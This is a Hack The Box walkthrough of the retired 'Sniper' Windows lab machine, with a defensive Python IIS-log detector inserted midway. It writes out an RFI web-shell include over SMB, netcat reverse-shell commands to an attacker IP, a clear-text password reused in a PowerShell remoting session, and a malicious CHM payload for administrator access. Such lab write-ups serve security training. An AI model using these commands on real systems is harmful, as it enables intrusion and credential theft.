Hack The Box - Sniper Server



Sniper is a retired (28.3.2020) Microsoft Windows server on the HackTheBox penetration testing lab. It was rated Medium difficulty and can be rooted by abusing Windows help files... As usual, I am going to try to write the entire walkthrough as detailed as possible, so it is clear to everyone what is being done and why.


We will use/learn: nmap, Burp Suite, Samba, enum4linux, reverse shells, netcat, PowerShell (including creating a credential object from a clear-text password), Windows Help files (*.chm), etc.

Getting User:

I am going to add the server's IP (10.10.10.151) to /etc/hosts file, so I can keep using the hostname (sniper.htb) instead of the IP address.

Let's start with a basic enumeration of the ports and services running on the server with nmap (Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. Source).

For those not familiar with the command, I suggest checking this cheat-sheet first: CheatSheet

command: nmap -sC -sV -A -p- sniper.htb


Checking the SMB ports (139/445) showed us nothing important, and neither did the enum4linux script (enum4linux is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts; it can be downloaded here: Download). So let's check HTTP port 80. The "landing" page does not really show us much; however, when we navigate to the blog and try to select a different language, it looks like the lang parameter of the page is vulnerable to Local File Inclusion / Remote File Inclusion (more information about LFI / RFI on Wikipedia):

 

Let's capture the traffic in Burp Suite and analyze it (Burp Suite is an integrated platform for performing security testing of web applications and is pre-installed in Kali Linux). We intercept the traffic coming to and from the site, send it to "Repeater" in Burp Suite and try to access a file that we know for certain is present on the server (e.g. \WINDOWS\System32\drivers\etc\hosts).


In the right-hand window we can see the contents of the hosts file, which means the include works and we should be able to include a file from a Samba share as well. Let's set up Samba on Kali Linux first. I tried to use the smbshare.py script, but it did not work, so we have to use the classic Samba share. Set up Samba as follows:


command: vi /etc/samba/smb.conf

And create your share:

Now create the directory which we are going to share for the attack:
command: mkdir /root/Downloads/HTB/sniper.htb/PK

And restart Samba:
command: service smbd restart

Now we should be able to get a reverse shell. I tested multiple PHP reverse shells, but could not get any of them working. Someone on the HTB forum advised me to get the White Winter Wolf shell, an interactive PHP web shell. Let's download it:

command: git clone https://github.com/WhiteWinterWolf/wwwolf-php-webshell.git
and copy the shell (it is inside the cloned repository directory) to the Samba directory:
command: cp wwwolf-php-webshell/webshell.php /root/Downloads/HTB/sniper.htb/PK

Now we can check in Burp Suite that the Samba share is working and that the file is visible in the PK directory:


And it works! So now we can browse the server (the URL is sniper.htb/blog/?lang=\\<Your HTB VPN IP address>\PK\webshell.php).
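From the defender's side, the requests in this section (the traversal to the hosts file and the \\<IP>\PK\webshell.php include) are visible in the IIS logs. As an added example that is not part of the original post, here is a small Python detector over constructed IIS W3C log lines; the rule names and the sample lines are my own, the log layout is the default IIS field list.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample IIS W3C log lines (not real Sniper logs); the #Fields header
# follows the default IIS layout, so the same parser works on real logs.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-03-28 10:00:01 10.10.10.151 GET /blog/ lang=blog-en.php 80 - 10.10.14.6 Mozilla/5.0 - 200 0 0 15
2020-03-28 10:00:07 10.10.10.151 GET /blog/ lang=\\10.10.14.6\PK\webshell.php 80 - 10.10.14.6 Mozilla/5.0 - 200 0 0 340
2020-03-28 10:00:09 10.10.10.151 GET /blog/ lang=%5C%5C10.10.14.6%5CPK%5Cwebshell.php 80 - 10.10.14.6 Mozilla/5.0 - 200 0 0 310
2020-03-28 10:00:12 10.10.10.151 GET /blog/ lang=..\..\..\WINDOWS\System32\drivers\etc\hosts 80 - 10.10.14.6 Mozilla/5.0 - 200 0 0 12
2020-03-28 10:00:15 10.10.10.151 GET /blog/ lang=http://10.10.14.6/webshell.php 80 - 10.10.14.6 Mozilla/5.0 - 200 0 0 300
2020-03-28 10:00:20 10.10.10.151 GET /blog/ lang=blog-es.php 80 - 10.10.14.7 Mozilla/5.0 - 200 0 0 14
"""

# Ordered rules: the first pattern that matches the decoded lang= value names the finding.
INCLUSION_PATTERNS = [
    ("unc-path",   re.compile(r"^(\\\\|//)[^\\/]+[\\/]")),                # \\host\share\file (the RFI-over-SMB case)
    ("remote-url", re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)),            # http://host/file
    ("traversal",  re.compile(r"(^|[\\/])\.\.([\\/]|$)")),                  # ..\ or ../ segments
    ("abs-path",   re.compile(r"^([a-z]:[\\/]|[\\/](windows|inetpub)[\\/])", re.I)),  # C:\..., \WINDOWS\...
]

def classify_lang_value(value):
    """Return the rule name for a suspicious lang= value, or None if it looks like a plain language file."""
    value = unquote(value).strip()  # second decode catches double-encoded payloads
    for name, pattern in INCLUSION_PATTERNS:
        if pattern.search(value):
            return name
    return None

def find_inclusion_attempts(log_text):
    """Scan IIS W3C log text and return one dict per request whose lang= parameter looks like LFI/RFI."""
    fields, hits = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the records that follow
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):      # malformed or differently laid-out record
            continue
        record = dict(zip(fields, parts))
        for value in parse_qs(record.get("cs-uri-query", ""), keep_blank_values=True).get("lang", []):
            reason = classify_lang_value(value)
            if reason:
                hits.append({"time": f"{record['date']} {record['time']}", "client": record["c-ip"],
                             "reason": reason, "query": record["cs-uri-query"]})
                break
    return hits
```

Running find_inclusion_attempts(SAMPLE_LOG) flags four of the six sample requests (two UNC includes, one traversal, one remote URL) and leaves the two legitimate language selections alone.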
When we navigate to the C:\Users directory, we can see that a user Chris exists on the server. We will need to find his credentials. But first, we should get a proper reverse shell. Let's try to download netcat for Windows:

On the server create a new directory under c:\ (command: mkdir PK)

Download netcat from here: Download (note that this is the fifth version of netcat I tried; there seems to be an antivirus active on the server, preventing certain files from being copied over). Also make sure you download version 1.12.

Once you have the directory created, upload nc.exe into it (via the upload button). You should get a success message "Uploaded file c:\PK\nc.exe successfully":


Now we will be able to get our reverse shell by using the nc.exe file we copied over:

On Kali Linux run the command: nc -lnvp 5678
On the Windows server run the command: nc.exe -e PowerShell <Your IP Address> 5678   and you will get the reverse shell:


Now we can start the enumeration. In the C:\inetpub\wwwroot\user directory there is a file called db.php, which contains the MySQL connection details, including a username and password:

I tried to log in via the evil-winrm tool, but I was not able to log in with the credentials found, possibly because of the SeImpersonatePrivilege privilege (When you assign the "Impersonate a client after authentication" user right to a user, you permit programs that run on behalf of that user to impersonate a client. This security setting helps to prevent unauthorized servers from impersonating clients that connect to it through methods such as remote procedure calls (RPC) or named pipes. Source).


No local privilege to exploit, so we need to figure out another way in. We can, however, create a PowerShell credential object from the clear-text password. Based on this article we are able to create a new PowerShell session by using that credential and a PS command mentioned in this Microsoft technical note. Instead of one long line, I prefer to store the values in variables like this:


# Credentials found in db.php (domain\user form for the local account)
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'

# Wrap the clear-text password in a SecureString so it can be used in a credential object
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force

# Build the PSCredential object from the username and the SecureString
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

# Open a new PowerShell remoting session on the local host as Chris
$session = New-PSSession -ComputerName sniper -Credential $credential



Then open another netcat listener on our Kali Linux (command: nc -lnvp 6789) and run the following command in the session on the Sniper server:

Invoke-Command -Session $session -ScriptBlock { C:\pk\nc.exe -e powershell 10.10.14.6 6789 }



Now we have a reverse shell as user Chris and we can get the user's flag in C:\Users\Chris\Desktop\user.txt



Getting Root:

Quick enumeration of all "uncommon" directories on the server revealed a note in C:\Docs directory, left by the CEO of the company:


So it looks like the web is somehow vulnerable. Let's continue to search the server. In Users\chris\Downloads we can see an instructions.chm file:


What does Google say about CHM files:

CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. It may contain many compressed HTML documents and the images and JavaScript they link to. CHM features include a table of contents, index, and full-text searching.


After a bit of googling various exploits of CHM files, I came across this PowerShell script (Link), which creates a malicious payload.

I tried to upload it to the Windows server and create a payload with another reverse shell, but the antivirus is blocking the file upload via the PHP web shell we used earlier. So let's try to transfer it via the SimpleHTTPServer.py script (can be downloaded here):

In your Kali Linux run:  
root@kali:~/Downloads/scripts/Out-CHM# python ../SimpleHTTPServer/SimpleHTTPServer.py 80
Serving HTTP on 0.0.0.0 port 80 ...



and then on the Windows server run:
PS C:\PK> wget http://10.10.14.6:80/out-CHM.ps1 -OutFile out-chm.ps1

Running the script will create a new file called doc.chm.

Unfortunately, the antivirus on the server keeps deleting the file, so we need to create the payload on another MS Windows machine with Windows Defender switched off! 

Run the following steps on our personal Windows computer. First, disable the antivirus:



Before you are able to create the payload, you will have to download and install HTML Help Workshop from here: Link. As described in the Out-CHM documentation, it is a prerequisite to have HTML Help Workshop installed: "The script generates a CHM file which needs to be sent to a target. You must have hhc.exe (HTML Help Workshop) on your machine to use this script." Source

Once the antivirus is disabled and HTML Help Workshop is installed, download the PowerShell script again:

Import it via this command: Import-Module Out-CHM.ps1 and then you can create the malicious payload with the reverse shell:

And copy it back to your Kali Linux. Then start the netcat listener, command: nc -lvnp 9988

Upload our doc.chm file to the Sniper Windows server, into the c:\Docs directory, as instructed by "the CEO":

 

Wait a minute (the file will be picked up) and you will get a reverse shell as administrator. 






